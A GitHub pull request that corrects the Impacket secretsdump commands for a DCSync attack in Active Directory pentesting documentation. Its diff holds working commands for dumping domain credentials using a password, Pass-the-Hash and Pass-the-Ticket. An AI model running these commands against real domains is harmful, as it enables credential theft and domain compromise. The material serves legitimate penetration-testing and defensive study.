### PR TITLE
fixing DCSync PTT cli error #173

### DIFF
--- a/docs/src/ad/movement/credentials/dumping/dcsync.md
+++ b/docs/src/ad/movement/credentials/dumping/dcsync.md
@@ -25,13 +25,13 @@ On UNIX-like systems, this attack can be carried out with [Impacket](https://git
 
 ```bash
 # using a plaintext password
-secretsdump -outputfile 'something' 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'
+secretsdump -outputfile 'dcsync' -dc-ip "$DC_IP" "$DOMAIN"/"$USER":"$PASSWORD"@"$DC_HOST"
 
 # with Pass-the-Hash
-secretsdump -outputfile 'something' -hashes 'LMhash':'NThash' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
+secretsdump -outputfile 'dcsync' -hashes :"$NT_HASH" -dc-ip "$DC_IP" "$DOMAIN"/"$USER"@"$DC_HOST"
 
 # with Pass-the-Ticket
-secretsdump -k -outputfile 'something' 'DOMAIN'/'USER'@'DOMAINCONTROLLER'
+KRB5CCNAME=ticket.ccache secretsdump -k -no-pass -outputfile 'dcsync' -dc-ip "$DC_IP" @"$DC_HOST"
 ```
 
 The secretsdump script creates the following files.


### PR DESCRIPTION
### **PR Type**
Documentation


___

### **Description**
- Fixed DCSync Pass-the-Ticket command syntax error

- Updated secretsdump examples with proper variable formatting

- Added missing `-no-pass` flag for Kerberos authentication


___

### **Changes diagram**

```mermaid
flowchart LR
  A["Old PTT Command"] --> B["Fixed PTT Command"]
  B --> C["Added -no-pass flag"]
  B --> D["Updated variable format"]
```


___



### **Changes walkthrough** 📝
<table><thead><tr><th></th><th align="left">Relevant files</th></tr></thead><tbody><tr><td><strong>Documentation</strong></td><td><table>
<tr>
  <td>
    <details>
      <summary><strong>dcsync.md</strong><dd><code>Fix DCSync secretsdump command examples</code>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </dd></summary>
<hr>

docs/src/ad/movement/credentials/dumping/dcsync.md

<li>Fixed Pass-the-Ticket secretsdump command syntax<br> <li> Added missing <code>-no-pass</code> flag for Kerberos authentication<br> <li> Updated all examples to use consistent variable formatting<br> <li> Improved command structure with proper environment variable usage


</details>


  </td>
  <td><a href="https://github.com/The-Hacker-Recipes/The-Hacker-Recipes/pull/192/files#diff-bf734e3c98cfdc1cc143c25c7e75b0abaca1c457e4cbc8a4977c2b4523e7d575">+3/-3</a>&nbsp; &nbsp; &nbsp; </td>

</tr>
</table></td></tr></tr></tbody></table>

___

> <details> <summary>  Need help?</summary><li>Type <code>/help how to ...</code> in the comments thread for any questions about Qodo Merge usage.</li><li>Check out the <a href="https://qodo-merge-docs.qodo.ai/usage-guide/">documentation</a> for more information.</li></details>